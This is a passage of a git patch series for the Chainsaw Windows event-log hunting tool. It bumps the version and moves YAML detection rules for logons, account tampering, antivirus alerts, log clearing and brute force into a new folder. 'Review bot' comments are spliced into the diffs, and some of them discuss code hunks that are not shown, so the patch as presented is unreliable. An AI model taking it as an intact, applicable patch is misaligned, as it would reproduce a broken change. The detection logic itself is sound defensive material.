 Cargo.toml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/Cargo.lock b/Cargo.lock
index 3f6f8c1b..3959d1de 100644
--- a/Cargo.lock
+++ b/Cargo.lock
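Review bot: In the `Filter::Expression` arm the block `{ let expression = optimiser::shake(expression); let expression = optimiser::rewrite(expression); let expression = optimiser::matrix(expression); expression }` rebinds the same name three times and then returns the binding, which clippy reports as `let_and_return`. Nesting the calls reads as the pipeline it is and needs no block: `Filter::Expression(optimiser::matrix(optimiser::rewrite(optimiser::shake(expression))))`. The `Filter::Detection` arm above applies the same three passes to `detection.expression` one statement at a time, so the two arms are also inconsistent in style.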
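Review bot: `rule.tau.optimise(Default::default())` replaces the explicit `optimise(true, true)` at both call sites in src/rule/mod.rs (this hunk and the `@@ -146` hunk), so which optimiser passes run on a loaded rule is now decided by tau-engine's `Default` implementation rather than by this crate, and a later dependency bump can change rule evaluation here without any edit to this file. Constructing the options value with its fields spelt out at both sites would make the chosen set explicit; failing that, a comment such as `// relies on tau-engine's default optimisation set; keep in step with the passes applied in chainsaw.rs` would at least record the dependency. Whether the defaults match the previous `true, true` is not visible from this hunk.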
@@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
 
 [[package]]
 name = "chainsaw"
-version = "2.0.0-alpha.4"
+version = "2.0.0-alpha.5"
 dependencies = [
  "aho-corasick 0.7.18",
  "anyhow",
diff --git a/Cargo.toml b/Cargo.toml
index fd5be64f..c5b32653 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "chainsaw"
-version = "2.0.0-alpha.4"
+version = "2.0.0-alpha.5"
 repository = "https://github.com/countercept/chainsaw"
 description = "Rapidly Search and Hunt Through Windows Event Logs"
 authors = ["James Dorgan ","Alex Kornitzer "]
From 55426673233b2e0c2d2eef68e4b1f7203425a14e Mon Sep 17 00:00:00 2001
From: FranticTyping Date: Fri, 24 Jun 2022 00:00:20 +0100 Subject: [PATCH 39/77] renaming chainsaw rules --- rules/account_tampering/new_user_created.yml | 29 ------------- .../user_added_to_global_group.yml | 36 ---------------- .../user_added_to_local_group.yml | 36 ---------------- .../user_added_to_universal_group.yml | 36 ---------------- rules/antivirus/f-secure.yml | 43 ------------------- rules/antivirus/kaspersky.yml | 31 ------------- rules/antivirus/sophos.yml | 31 ------------- rules/antivirus/windows_defender.yml | 31 ------------- rules/lateral_movement/batch_logon.yml | 41 ------------------ rules/lateral_movement/interactive_logon.yml | 41 ------------------ rules/lateral_movement/network_logon.yml | 41 ------------------ rules/lateral_movement/rdp_logon.yml | 41 ------------------ rules/lateral_movement/service_logon.yml | 41 ------------------ rules/lateral_movement/unlock_logon.yml | 40 ----------------- .../security_audit_log_was_cleared.yml | 32 -------------- .../log_tampering/system_log_was_cleared.yml | 32 -------------- rules/login_attacks/account_brute_force.yml | 34 --------------- rules/service_tampering/event_log.yml | 31 ------------- 18 files changed, 647 deletions(-) delete mode 100644 rules/account_tampering/new_user_created.yml delete mode 100644 rules/account_tampering/user_added_to_global_group.yml delete mode 100644 rules/account_tampering/user_added_to_local_group.yml delete mode 100644 rules/account_tampering/user_added_to_universal_group.yml delete mode 100644 rules/antivirus/f-secure.yml delete mode 100644 rules/antivirus/kaspersky.yml delete mode 100644 rules/antivirus/sophos.yml delete mode 100644 rules/antivirus/windows_defender.yml delete mode 100644 rules/lateral_movement/batch_logon.yml delete mode 100644 rules/lateral_movement/interactive_logon.yml delete mode 100644 rules/lateral_movement/network_logon.yml delete mode 100644 rules/lateral_movement/rdp_logon.yml delete mode 100644 
rules/lateral_movement/service_logon.yml delete mode 100644 rules/lateral_movement/unlock_logon.yml delete mode 100644 rules/log_tampering/security_audit_log_was_cleared.yml delete mode 100644 rules/log_tampering/system_log_was_cleared.yml delete mode 100644 rules/login_attacks/account_brute_force.yml delete mode 100644 rules/service_tampering/event_log.yml diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml deleted file mode 100644 index 3cd5844d..00000000 --- a/rules/account_tampering/new_user_created.yml +++ /dev/null @@ -1,29 +0,0 @@ ---- -title: New User Created -group: Account Tampering -description: A new user was created. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: User SID - to: Event.EventData.TargetSid - - -filter: - Event.System.EventID: 4720 diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml deleted file mode 100644 index ef556794..00000000 --- a/rules/account_tampering/user_added_to_global_group.yml +++ /dev/null 
@@ -1,36 +0,0 @@ ---- -title: User Added to Global Group -group: Account Tampering -description: A user was added to an global group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4728 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml deleted file mode 100644 index 8af797ea..00000000 --- a/rules/account_tampering/user_added_to_local_group.yml +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: User Added to Local Group -group: Account Tampering -description: A user was added to a local group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4732 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml deleted file mode 100644 index bed52b27..00000000 --- a/rules/account_tampering/user_added_to_universal_group.yml +++ /dev/null 
@@ -1,36 +0,0 @@ ---- -title: User Added to Universal Group -group: Account Tampering -description: A user was added to a universal group. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Member SID - to: Event.EventData.MemberSid - - -filter: - condition: global and not admin_or_rdp - - global: - Event.System.EventID: 4756 - admin_or_rdp: - Event.EventData.TargetUserName: - - Admin - - Remote Desktop diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml deleted file mode 100644 index 20fde701..00000000 --- a/rules/antivirus/f-secure.yml +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: F-Secure Antivirus -group: Antivirus -description: Events from F-Secure's Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Name - from: threat_name - container: - field: Event.EventData.rv - format: json - to: iname - - name: Threat Path - from: threat_path - container: - field: Event.EventData.rv - format: json - to: obj.ref - - name: SHA1 - from: sha1 - container: - field: Event.EventData.rv - format: json - to: obj.sha1 - - -filter: - Event.System.Provider: F-Secure Ultralight SDK diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml deleted file mode 100644 index e466e989..00000000 --- a/rules/antivirus/kaspersky.yml +++ /dev/null 
@@ -1,31 +0,0 @@ ---- -title: Kaspersky Antivirus -group: Antivirus -description: Events from Kaspersky's Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Name - to: Event.EventData.Data[1] - - name: Threat Path - to: Event.EventData.Data[0] - - -filter: - Event.System.Provider: - - Real-time file protection - - OnDemandScan diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml deleted file mode 100644 index db54ef2a..00000000 --- a/rules/antivirus/sophos.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: Sophos Antivirus -group: Antivirus -description: Events from Sophos' Antivirus products. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Threat Type - to: Event.EventData.Data[0] - - name: Threat Name - to: Event.EventData.Data[2] - - name: Threat Path - to: Event.EventData.Data[1] - - -filter: - Event.System.Provider: Sophos Anti-Virus diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml deleted file mode 100644 index b5931982..00000000 --- a/rules/antivirus/windows_defender.yml +++ /dev/null 
@@ -1,31 +0,0 @@ ---- -title: Windows Defender -group: Antivirus -description: Events from Windows Defender. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.Detection User - - name: Threat Name - to: Event.EventData.Threat Name - - name: Threat Path - to: Event.EventData.Path - - -filter: - Event.System.Provider: Microsoft-Windows-Windows Defender diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml deleted file mode 100644 index a22e15c3..00000000 --- a/rules/lateral_movement/batch_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Batch Logon -group: Lateral Movement -description: An Batch based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: batch and not local_ips_or_machine_accounts - - batch: - Event.System.EventID: 4624 - Event.EventData.LogonType: 4 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml deleted file mode 100644 index 4f356a58..00000000 --- a/rules/lateral_movement/interactive_logon.yml +++ /dev/null 
@@ -1,41 +0,0 @@ ---- -title: Interactive Logon -group: Lateral Movement -description: An Interactive based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: interactive and not local_ips_or_machine_accounts - - interactive: - Event.System.EventID: 4624 - Event.EventData.LogonType: 2 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml deleted file mode 100644 index 2a0c84ff..00000000 --- a/rules/lateral_movement/network_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Network Logon -group: Lateral Movement -description: An Network based logon -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: network and not local_ips_or_machine_accounts - - network: - Event.System.EventID: 4624 - Event.EventData.LogonType: 3 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml deleted file mode 100644 index 6b30d410..00000000 
--- a/rules/lateral_movement/rdp_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: RDP Logon -group: Lateral Movement -description: An RDP based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: rdp and not local_ips_or_machine_accounts - - rdp: - Event.System.EventID: 4624 - Event.EventData.LogonType: 10 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml deleted file mode 100644 index 3a445b98..00000000 --- a/rules/lateral_movement/service_logon.yml +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: Service Logon -group: Lateral Movement -description: An Service based logon -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: service and not local_ips_or_machine_accounts - - service: - Event.System.EventID: 4624 - Event.EventData.LogonType: 5 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* 
diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml deleted file mode 100644 index 74ab79a8..00000000 --- a/rules/lateral_movement/unlock_logon.yml +++ /dev/null @@ -1,40 +0,0 @@ ---- -title: Unlock Logon -group: Lateral Movement -description: An Unlock based logon. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.EventData.TargetUserName - - name: Logon Type - to: Event.EventData.LogonType - - name: IP Address - to: Event.EventData.IpAddress - - -filter: - condition: unlock and not local_ips_or_machine_accounts - - unlock: - Event.System.EventID: 4624 - Event.EventData.LogonType: 7 - local_ips_or_machine_accounts: - - Event.EventData.IpAddress: - - '-' - - 127.0.0.1 - - ::1 - - Event.EventData.TargetUserName: $* diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml deleted file mode 100644 index bd010f2f..00000000 --- a/rules/log_tampering/security_audit_log_was_cleared.yml +++ /dev/null @@ -1,32 +0,0 @@ ---- -title: Security Audit Logs Cleared -group: Log Tampering -description: The security audit logs were cleared. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.UserData.LogFileCleared.SubjectUserName - - -filter: - condition: security_log_cleared and not empty - - security_log_cleared: - Event.System.EventID: 1102 - empty: - Event.UserData.LogFileCleared.SubjectUserName: 
diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml deleted file mode 100644 index a3a6ad6c..00000000 --- a/rules/log_tampering/system_log_was_cleared.yml +++ /dev/null @@ -1,32 +0,0 @@ ---- -title: System Logs Cleared -group: Log Tampering -description: The system logs were cleared. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: User - to: Event.UserData.LogFileCleared.SubjectUserName - - -filter: - condition: system_log_cleared and not empty - - system_log_cleared: - Event.System.EventID: 104 - empty: - Event.UserData.LogFileCleared.SubjectUserName: diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml deleted file mode 100644 index 9935fe9e..00000000 --- a/rules/login_attacks/account_brute_force.yml +++ /dev/null @@ -1,34 +0,0 @@ ---- -title: Account Brute Force -group: Login Attacks -description: An account that appears to have been brute forced. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: User - to: Event.EventData.TargetUserName - - -filter: - condition: failed_logons and not empty - - failed_logons: - Event.System.EventID: 4625 - empty: - Event.EventData.TargetUserName: 'null' - - -aggregate: - count: '>5' - fields: - - Event.EventData.TargetUserName diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml deleted file mode 100644 index 54c9414c..00000000 --- a/rules/service_tampering/event_log.yml +++ /dev/null 
@@ -1,31 +0,0 @@ ---- -title: Windows Event Log Stopped -group: Service Tampering -description: The Windows Event Log service has been stopped. -authors: - - FranticTyping - - -kind: evtx -level: info -status: stable -timestamp: Event.System.TimeCreated - - -fields: - - name: Event ID - to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - - name: Computer - to: Event.System.Computer - - name: Service Name - to: Event.EventData.param1 - - name: Action - to: Event.EventData.param2 - - -filter: - Event.System.EventID: 7040 - Event.EventData.param1: Windows Event Log - Event.EventData.param2: disabled From cba03e77c730af8a55f7a7eb07a2e929a5160d79 Mon Sep 17 00:00:00 2001 
From: FranticTyping Date: Fri, 24 Jun 2022 00:00:27 +0100 Subject: [PATCH 40/77] renaming chainsaw rules --- .../new_user_created.yml.chainsaw | 29 +++++++++++++ .../user_added_to_global_group.yml.chainsaw | 36 ++++++++++++++++ .../user_added_to_local_group.yml.chainsaw | 36 ++++++++++++++++ ...user_added_to_universal_group.yml.chainsaw | 36 ++++++++++++++++ .../antivirus/f-secure.yml.chainsaw | 43 +++++++++++++++++++ .../antivirus/kaspersky.yml.chainsaw | 31 +++++++++++++ chainsaw_rules/antivirus/sophos.yml.chainsaw | 31 +++++++++++++ .../antivirus/windows_defender.yml.chainsaw | 31 +++++++++++++ .../lateral_movement/batch_logon.yml.chainsaw | 41 ++++++++++++++++++ .../interactive_logon.yml.chainsaw | 41 ++++++++++++++++++ .../network_logon.yml.chainsaw | 41 ++++++++++++++++++ .../lateral_movement/rdp_logon.yml.chainsaw | 41 ++++++++++++++++++ .../service_logon.yml.chainsaw | 41 ++++++++++++++++++ .../unlock_logon.yml.chainsaw | 40 +++++++++++++++++ ...ecurity_audit_log_was_cleared.yml.chainsaw | 32 ++++++++++++++ .../system_log_was_cleared.yml.chainsaw | 32 ++++++++++++++ .../account_brute_force.yml.chainsaw | 34 +++++++++++++++ .../service_tampering/event_log.yml.chainsaw | 31 +++++++++++++ 18 files changed, 647 insertions(+) create mode 100644 chainsaw_rules/account_tampering/new_user_created.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw create mode 100644 chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/f-secure.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/kaspersky.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/sophos.yml.chainsaw create mode 100644 chainsaw_rules/antivirus/windows_defender.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw create mode 100644 
chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/network_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/service_logon.yml.chainsaw create mode 100644 chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw create mode 100644 chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw create mode 100644 chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw create mode 100644 chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw create mode 100644 chainsaw_rules/service_tampering/event_log.yml.chainsaw diff --git a/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw b/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw new file mode 100644 index 00000000..3cd5844d --- /dev/null +++ b/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw @@ -0,0 +1,29 @@ +--- +title: New User Created +group: Account Tampering +description: A new user was created. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: User SID + to: Event.EventData.TargetSid + + +filter: + Event.System.EventID: 4720 diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw new file mode 100644 index 00000000..ef556794 --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw 
@@ -0,0 +1,36 @@ +--- +title: User Added to Global Group +group: Account Tampering +description: A user was added to an global group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4728 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw new file mode 100644 index 00000000..8af797ea --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw @@ -0,0 +1,36 @@ +--- +title: User Added to Local Group +group: Account Tampering +description: A user was added to a local group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4732 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw new file mode 100644 index 00000000..bed52b27 --- /dev/null +++ b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw 
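Review bot: The `admin_or_rdp` exclusion removes exactly the group additions an analyst most wants to see, and its values look like partial names: on 4728/4732/4756 `TargetUserName` carries the group name (`Administrators`, `Remote Desktop Users`), so if tau treats a bare string as an exact match, `Admin` and `Remote Desktop` never match and the exclusion is dead, and if it is a prefix match the rule deliberately drops the highest-value events with no higher-severity rule in this set covering them. Either a comment above `admin_or_rdp:` stating the intent, e.g. `# Admin/RDP group changes are covered by <RULE_NAME>`, or removal of the exclusion is needed. The same block is repeated in user_added_to_local_group.yml.chainsaw (next hunk on this line) and user_added_to_universal_group.yml.chainsaw (next line), where the selection identifier is still named `global` although the filters are 4732 (local) and 4756 (universal); renaming it to `local:`/`universal:` keeps `condition:` honest.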
@@ -0,0 +1,36 @@ +--- +title: User Added to Universal Group +group: Account Tampering +description: A user was added to a universal group. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Member SID + to: Event.EventData.MemberSid + + +filter: + condition: global and not admin_or_rdp + + global: + Event.System.EventID: 4756 + admin_or_rdp: + Event.EventData.TargetUserName: + - Admin + - Remote Desktop diff --git a/chainsaw_rules/antivirus/f-secure.yml.chainsaw b/chainsaw_rules/antivirus/f-secure.yml.chainsaw new file mode 100644 index 00000000..20fde701 --- /dev/null +++ b/chainsaw_rules/antivirus/f-secure.yml.chainsaw @@ -0,0 +1,43 @@ +--- +title: F-Secure Antivirus +group: Antivirus +description: Events from F-Secure's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Name + from: threat_name + container: + field: Event.EventData.rv + format: json + to: iname + - name: Threat Path + from: threat_path + container: + field: Event.EventData.rv + format: json + to: obj.ref + - name: SHA1 + from: sha1 + container: + field: Event.EventData.rv + format: json + to: obj.sha1 + + +filter: + Event.System.Provider: F-Secure Ultralight SDK diff --git a/chainsaw_rules/antivirus/kaspersky.yml.chainsaw b/chainsaw_rules/antivirus/kaspersky.yml.chainsaw new file mode 100644 index 00000000..e466e989 --- /dev/null +++ b/chainsaw_rules/antivirus/kaspersky.yml.chainsaw 
@@ -0,0 +1,31 @@ +--- +title: Kaspersky Antivirus +group: Antivirus +description: Events from Kaspersky's Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Name + to: Event.EventData.Data[1] + - name: Threat Path + to: Event.EventData.Data[0] + + +filter: + Event.System.Provider: + - Real-time file protection + - OnDemandScan diff --git a/chainsaw_rules/antivirus/sophos.yml.chainsaw b/chainsaw_rules/antivirus/sophos.yml.chainsaw new file mode 100644 index 00000000..db54ef2a --- /dev/null +++ b/chainsaw_rules/antivirus/sophos.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Sophos Antivirus +group: Antivirus +description: Events from Sophos' Antivirus products. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Threat Type + to: Event.EventData.Data[0] + - name: Threat Name + to: Event.EventData.Data[2] + - name: Threat Path + to: Event.EventData.Data[1] + + +filter: + Event.System.Provider: Sophos Anti-Virus diff --git a/chainsaw_rules/antivirus/windows_defender.yml.chainsaw b/chainsaw_rules/antivirus/windows_defender.yml.chainsaw new file mode 100644 index 00000000..b5931982 --- /dev/null +++ b/chainsaw_rules/antivirus/windows_defender.yml.chainsaw 
@@ -0,0 +1,31 @@ +--- +title: Windows Defender +group: Antivirus +description: Events from Windows Defender. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.Detection User + - name: Threat Name + to: Event.EventData.Threat Name + - name: Threat Path + to: Event.EventData.Path + + +filter: + Event.System.Provider: Microsoft-Windows-Windows Defender diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw new file mode 100644 index 00000000..a22e15c3 --- /dev/null +++ b/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Batch Logon +group: Lateral Movement +description: An Batch based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: batch and not local_ips_or_machine_accounts + + batch: + Event.System.EventID: 4624 + Event.EventData.LogonType: 4 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw new file mode 100644 index 00000000..4f356a58 --- /dev/null +++ b/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw 
